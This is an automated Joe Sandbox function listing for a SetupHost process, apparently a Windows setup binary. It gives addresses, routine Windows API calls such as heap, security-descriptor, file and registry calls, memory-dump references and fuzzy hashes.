                                                                                                                        • Opcode Fuzzy Hash: 9ce635fc9e69a2769a1f77cc119cba4d3e6cc6e8af025d5c7f08e5beb520e809
                                                                                                                        • Instruction Fuzzy Hash: F12192B59006169BCB08DF94D855AEEBBB8FF44704F10852AF9419B351DBB0DA05CFD4
                                                                                                                        Function 004F9A99 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 55COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004FC7BE: GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?), ref: 004FC90E
                                                                                                                          • Part of subcall function 004FC7BE: HeapFree.KERNEL32(00000000), ref: 004FC915
                                                                                                                        • memcpy.MSVCRT(?,00000000,00000000,?,00000000,?,00000000,Tel#Asmv,?,?,?,?,004F8C9B,?,00000000,00000000), ref: 004F9AE3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeProcessmemcpy
                                                                                                                        • String ID: Tel#Asmv
                                                                                                                        • API String ID: 993092371-2294149968
                                                                                                                        • Opcode ID: 0eb6d58830fa03d831a66d2cfcb9c77943247600fde16e7bf8e1d3432f19905c
                                                                                                                        • Instruction ID: 1b6b20f430a2cace138e556ca340a5d17f05d8ad83743a0b6f463f569daefdbd
                                                                                                                        • Opcode Fuzzy Hash: 0eb6d58830fa03d831a66d2cfcb9c77943247600fde16e7bf8e1d3432f19905c
                                                                                                                        • Instruction Fuzzy Hash: 2701C071B00929A7CB15EB56C891E6EB769AFC4754710012FEA058B351DF78AD02C7D8
                                                                                                                        Function 00542800 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00541F8C: InitializeSecurityDescriptor.ADVAPI32(?,00000001,00552740,0000003C,005427B4), ref: 00541FCA
                                                                                                                          • Part of subcall function 00541F8C: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,005427B4,?,00000001,00552740,0000003C,005427B4), ref: 00541FEF
                                                                                                                          • Part of subcall function 00541F8C: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0000003C,?,00000001,00552740,0000003C,005427B4), ref: 00542010
                                                                                                                          • Part of subcall function 00541F8C: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000013,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000001,00552740,0000003C,005427B4), ref: 00542031
                                                                                                                          • Part of subcall function 00541F8C: GetCurrentThread.KERNEL32 ref: 00542047
                                                                                                                          • Part of subcall function 00541F8C: OpenThreadToken.ADVAPI32(00000000,?,00000001,00552740,0000003C,005427B4), ref: 0054204E
                                                                                                                          • Part of subcall function 00541F8C: GetLastError.KERNEL32(?,00000001,00552740,0000003C,005427B4), ref: 00542058
                                                                                                                          • Part of subcall function 00541F8C: GetCurrentProcess.KERNEL32(00000008,00552740,?,00000001,00552740,0000003C,005427B4), ref: 0054206F
                                                                                                                          • Part of subcall function 00541F8C: OpenProcessToken.ADVAPI32(00000000,?,00000001,00552740,0000003C,005427B4), ref: 00542076
                                                                                                                        • CreateFileMappingW.KERNELBASE(000000FF,00000000,08000004,00000000,?,?), ref: 0054283E
                                                                                                                        • GetLastError.KERNEL32 ref: 0054285C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Initialize$Allocate$CurrentErrorLastOpenProcessThreadToken$CreateDescriptorFileMappingSecurity
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2809032385-0
                                                                                                                        • Opcode ID: bd35c31298798a61970a29259a0ccaa3ee728d588ee8d53a282db31fcba408c6
                                                                                                                        • Instruction ID: 82a03fdac0cbaf493ece0473740882afc0c1088fa42b97d3188d01a4aa6aa63d
                                                                                                                        • Opcode Fuzzy Hash: bd35c31298798a61970a29259a0ccaa3ee728d588ee8d53a282db31fcba408c6
                                                                                                                        • Instruction Fuzzy Hash: 93018437A00329ABCB109FF99C44AEEBFA4FB98765F504128B915E3180D7349904CBA0
                                                                                                                        Function 005427A0 Relevance: 3.0, APIs: 2, Instructions: 36synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00541F8C: InitializeSecurityDescriptor.ADVAPI32(?,00000001,00552740,0000003C,005427B4), ref: 00541FCA
                                                                                                                          • Part of subcall function 00541F8C: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,005427B4,?,00000001,00552740,0000003C,005427B4), ref: 00541FEF
                                                                                                                          • Part of subcall function 00541F8C: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0000003C,?,00000001,00552740,0000003C,005427B4), ref: 00542010
                                                                                                                          • Part of subcall function 00541F8C: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000013,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000001,00552740,0000003C,005427B4), ref: 00542031
                                                                                                                          • Part of subcall function 00541F8C: GetCurrentThread.KERNEL32 ref: 00542047
                                                                                                                          • Part of subcall function 00541F8C: OpenThreadToken.ADVAPI32(00000000,?,00000001,00552740,0000003C,005427B4), ref: 0054204E
                                                                                                                          • Part of subcall function 00541F8C: GetLastError.KERNEL32(?,00000001,00552740,0000003C,005427B4), ref: 00542058
                                                                                                                          • Part of subcall function 00541F8C: GetCurrentProcess.KERNEL32(00000008,00552740,?,00000001,00552740,0000003C,005427B4), ref: 0054206F
                                                                                                                          • Part of subcall function 00541F8C: OpenProcessToken.ADVAPI32(00000000,?,00000001,00552740,0000003C,005427B4), ref: 00542076
                                                                                                                        • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 005427D3
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 005427E8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Initialize$Allocate$CurrentOpenProcessThreadToken$CreateDescriptorErrorLastMutexObjectSecuritySingleWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3485390411-0
                                                                                                                        • Opcode ID: fa1380121786b4cd6002b6de61984a9bb4a9c548f0d4522da9fba8728c468431
                                                                                                                        • Instruction ID: 907ac9d4bd0d17a0586142ac98e7a2a670f2145f74d7890875d0b733a0ec961e
                                                                                                                        • Opcode Fuzzy Hash: fa1380121786b4cd6002b6de61984a9bb4a9c548f0d4522da9fba8728c468431
                                                                                                                        • Instruction Fuzzy Hash: 1AF09636900639A7CB219B559C04AEDBB74FF84725F154115FC10B3280DB788A45CBE1
                                                                                                                        Function 00542310 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetFilePointer.KERNEL32(?,?,?,?), ref: 00542332
                                                                                                                        • GetLastError.KERNEL32 ref: 00542340
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2976181284-0
                                                                                                                        • Opcode ID: 69824743ea8c631a75184c4503dbb90db2496bcade9f2df512e6489e432b47de
                                                                                                                        • Instruction ID: beba942eec7318c0c4749a27776ea58fcf166e043bd3416f0989d480c5452326
                                                                                                                        • Opcode Fuzzy Hash: 69824743ea8c631a75184c4503dbb90db2496bcade9f2df512e6489e432b47de
                                                                                                                        • Instruction Fuzzy Hash: 91F030B691022CBF8B14CFB4EC498DE7FB8EB49361F104615FC16D3290E6709E00DAA0
                                                                                                                        Function 005422C0 Relevance: 3.0, APIs: 2, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BreakCloseDebugHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 212039098-0
                                                                                                                        • Opcode ID: bed914920b4b6f13a5b842f6faa5817c00e637a7d71ae608f2737e321146ec96
                                                                                                                        • Instruction ID: 4973505fa9f2320dd2c6004a08b2b38d90a37e97657d199d2638c90a2fca26b1
                                                                                                                        • Opcode Fuzzy Hash: bed914920b4b6f13a5b842f6faa5817c00e637a7d71ae608f2737e321146ec96
                                                                                                                        • Instruction Fuzzy Hash: 06C08C3100820CA787001B62FC0C8467E5CEAA4362B008020F80581020DB328811E961
                                                                                                                        Function 005445C1 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0054290C: GetVersion.KERNEL32 ref: 0054294F
                                                                                                                          • Part of subcall function 0054290C: GetModuleHandleW.KERNEL32(kernel32), ref: 005429C3
                                                                                                                          • Part of subcall function 0054290C: GetProcAddress.KERNEL32(00000000,AddVectoredExceptionHandler), ref: 005429D3
                                                                                                                          • Part of subcall function 0054290C: memset.MSVCRT ref: 00542A87
                                                                                                                          • Part of subcall function 0054290C: ExpandEnvironmentStringsW.KERNEL32(%windir%\system32\dbghelp.dll,?,00000104), ref: 00542AA0
                                                                                                                          • Part of subcall function 0054290C: LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00542AB3
                                                                                                                          • Part of subcall function 0054290C: FreeLibrary.KERNEL32(00000000), ref: 00542AC8
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000054,033264D0,00000000,0053FBAF), ref: 005445D7
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 005445DE
                                                                                                                          • Part of subcall function 00542D3B: __EH_prolog3.LIBCMT ref: 00542D42
                                                                                                                          • Part of subcall function 00542D3B: GetProcessHeap.KERNEL32(00000000,00000018,00000008,005445EF), ref: 00542D83
                                                                                                                          • Part of subcall function 00542D3B: HeapAlloc.KERNEL32(00000000), ref: 00542D8A
                                                                                                                          • Part of subcall function 00542D3B: GetProcessHeap.KERNEL32(00000000,00000018), ref: 00542DC1
                                                                                                                          • Part of subcall function 00542D3B: HeapAlloc.KERNEL32(00000000), ref: 00542DC8
                                                                                                                          • Part of subcall function 00542D3B: RaiseException.KERNEL32(C0000025,00000001,00000000,00000000), ref: 00542E2D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$AllocProcess$Library$AddressEnvironmentExceptionExpandFreeH_prolog3HandleLoadModuleProcRaiseStringsVersionmemset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3155722559-0
                                                                                                                        • Opcode ID: ae78a715a66e188448fa70d5b2a1c5e6852cbbd2b7428a7deaced4be40da248f
                                                                                                                        • Instruction ID: d66be4f4c9f191a2c2e3939d2574536460900571aba8dde1c071f656d423ec29
                                                                                                                        • Opcode Fuzzy Hash: ae78a715a66e188448fa70d5b2a1c5e6852cbbd2b7428a7deaced4be40da248f
                                                                                                                        • Instruction Fuzzy Hash: DCF0E572748632235A2962765C2DBFF4D8D7FD1B19B464529B805D3180DE50CC0289B4
                                                                                                                        Function 0054DF14 Relevance: 1.7, APIs: 1, Instructions: 183COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0054DF1B
                                                                                                                          • Part of subcall function 0054DD36: __EH_prolog3.LIBCMT ref: 0054DD3D
                                                                                                                          • Part of subcall function 004F8AF9: GetProcessHeap.KERNEL32(00000000,?,?,?,004FB826,?,?,?,00000000), ref: 004F8B0A
                                                                                                                          • Part of subcall function 004F8AF9: HeapFree.KERNEL32(00000000,?,004FB826,?,?,?,00000000), ref: 004F8B11
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3Heap$FreeProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2588364637-0
                                                                                                                        • Opcode ID: 37c313a7ad22e2af884ae11ad90ac0da0f11f123ec05b90f70e9c595490ecbaf
                                                                                                                        • Instruction ID: 95c81e2b945e9275baf61a53f12ba059a71e4557643f0d50aeeaa5ef47fd3804
                                                                                                                        • Opcode Fuzzy Hash: 37c313a7ad22e2af884ae11ad90ac0da0f11f123ec05b90f70e9c595490ecbaf
                                                                                                                        • Instruction Fuzzy Hash: DF810570D00209DBDF19DFA5D896BEEBBB1BF44308F14402EE516AB290DB789E48CB54
                                                                                                                        Function 0054DD36 Relevance: 1.7, APIs: 1, Instructions: 158COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0054DD3D
                                                                                                                          • Part of subcall function 0054D8F8: __EH_prolog3.LIBCMT ref: 0054D8FF
                                                                                                                          • Part of subcall function 0054DC16: __EH_prolog3_GS.LIBCMT ref: 0054DC20
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$H_prolog3_
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4240126716-0
                                                                                                                        • Opcode ID: 65235939210ea4fece72ea1f941d7e33e04fbed8e763c3478536958109bb72d8
                                                                                                                        • Instruction ID: 8c0a65d0c300111221f9837ae86997e11533d69a220776fba3d1c783a71aff4b
                                                                                                                        • Opcode Fuzzy Hash: 65235939210ea4fece72ea1f941d7e33e04fbed8e763c3478536958109bb72d8
                                                                                                                        • Instruction Fuzzy Hash: 0F51D8B0E0161A8BCF19DFA9D5916EDBBF1BF98308F14402EE905AB341EB759D04CB64
                                                                                                                        Function 004F8A19 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 431132790-0
                                                                                                                        • Opcode ID: b84de9d525eb0476238b1a1f736e67d7aa452ed8ed6d0e2bcf88bbb055ec1992
                                                                                                                        • Instruction ID: e391bfa7e88125672c9b2629fed9d0f32f13fc5489737539d3340699f9432106
                                                                                                                        • Opcode Fuzzy Hash: b84de9d525eb0476238b1a1f736e67d7aa452ed8ed6d0e2bcf88bbb055ec1992
                                                                                                                        • Instruction Fuzzy Hash: EF116631A0052E8BCF06AF64C4546BE7762EFC4364B29801FEA165F340DF389D029B89
                                                                                                                        Function 00548CD7 Relevance: 1.6, APIs: 1, Instructions: 53registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegSetValueExW.KERNEL32(?,?,00000000,00000001,00000000,?,00000000,00000001,00000000,00000000,?,?,0054A53E), ref: 00548D30
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Value
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3702945584-0
                                                                                                                        • Opcode ID: 31141da64fb43e1edcaf6f559dfd07fb4df36776a9ce948dd724d250f8be0c1a
                                                                                                                        • Instruction ID: f216df7fa804b35661f36be6027f7fd4e62cb961f2d656fb9744f1de329a4402
                                                                                                                        • Opcode Fuzzy Hash: 31141da64fb43e1edcaf6f559dfd07fb4df36776a9ce948dd724d250f8be0c1a
                                                                                                                        • Instruction Fuzzy Hash: D501D431E01114BBCB10AB699845AFFBBFDFB94704F10856AE406DB291EA749D4097A4
                                                                                                                        Function 00542880 Relevance: 1.5, APIs: 1, Instructions: 36fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,?,00000000,?,?,00000000), ref: 005428C8
                                                                                                                          • Part of subcall function 00541F8C: InitializeSecurityDescriptor.ADVAPI32(?,00000001,00552740,0000003C,005427B4), ref: 00541FCA
                                                                                                                          • Part of subcall function 00541F8C: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,005427B4,?,00000001,00552740,0000003C,005427B4), ref: 00541FEF
                                                                                                                          • Part of subcall function 00541F8C: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0000003C,?,00000001,00552740,0000003C,005427B4), ref: 00542010
                                                                                                                          • Part of subcall function 00541F8C: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000013,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000001,00552740,0000003C,005427B4), ref: 00542031
                                                                                                                          • Part of subcall function 00541F8C: GetCurrentThread.KERNEL32 ref: 00542047
                                                                                                                          • Part of subcall function 00541F8C: OpenThreadToken.ADVAPI32(00000000,?,00000001,00552740,0000003C,005427B4), ref: 0054204E
                                                                                                                          • Part of subcall function 00541F8C: GetLastError.KERNEL32(?,00000001,00552740,0000003C,005427B4), ref: 00542058
                                                                                                                          • Part of subcall function 00541F8C: GetCurrentProcess.KERNEL32(00000008,00552740,?,00000001,00552740,0000003C,005427B4), ref: 0054206F
                                                                                                                          • Part of subcall function 00541F8C: OpenProcessToken.ADVAPI32(00000000,?,00000001,00552740,0000003C,005427B4), ref: 00542076
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Initialize$Allocate$CurrentOpenProcessThreadToken$CreateDescriptorErrorFileLastSecurity
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 720879468-0
                                                                                                                        • Opcode ID: abb527c72aa6ecb46476e6bf059608e9ec7008e9a516777957541512de32643f
                                                                                                                        • Instruction ID: 8dcd58418d239e31421f285847504381a7a504cdf3b5ba12ada4b227645a5c73
                                                                                                                        • Opcode Fuzzy Hash: abb527c72aa6ecb46476e6bf059608e9ec7008e9a516777957541512de32643f
                                                                                                                        • Instruction Fuzzy Hash: 69F0CD36800228ABDF219FA5CC09ADEBF79FF88750F008019FE10A3250DB309A55CBD0
                                                                                                                        Function 0054AA5E Relevance: 1.5, APIs: 1, Instructions: 20registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegGetValueW.KERNEL32(80000002,?,00000000,00010010,00000000,00000003,00000000,00000003,?,0054AD43,Software\Policies\Microsoft\Windows\DataCollection,AllowTelemetry,00000000,?), ref: 0054AA7E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Value
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3702945584-0
                                                                                                                        • Opcode ID: 080ae95ebaa34547d01eba53f8fa0db0ece141975b176219161109780c255803
                                                                                                                        • Instruction ID: fbbf6404c2a5dd84966cfaaf65c5f0c4abe620c1269451f24ead584cf1237683
                                                                                                                        • Opcode Fuzzy Hash: 080ae95ebaa34547d01eba53f8fa0db0ece141975b176219161109780c255803
                                                                                                                        • Instruction Fuzzy Hash: 09E0C2B514020CBAD7118B42CC05FEB3AECA744754F1084047640D5190C6B5DA04A774
                                                                                                                        Function 004F8F1D Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNEL32(?,?,004E9438), ref: 004F8F23
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        • Opcode ID: d3239fe714c1306fb4576aab6db79cd8ce84c081e820b935e45f8bab1f4cb867
                                                                                                                        • Instruction ID: ec9444cb34d0926427a0ae0fc6849612a91ae9581fb9c25348b645c034bdde68
                                                                                                                        • Opcode Fuzzy Hash: d3239fe714c1306fb4576aab6db79cd8ce84c081e820b935e45f8bab1f4cb867
                                                                                                                        • Instruction Fuzzy Hash: 99D0A7323382180A9B7C77352C0513B25A1DA403743350B2FF12EC11D0DD3DCC425114
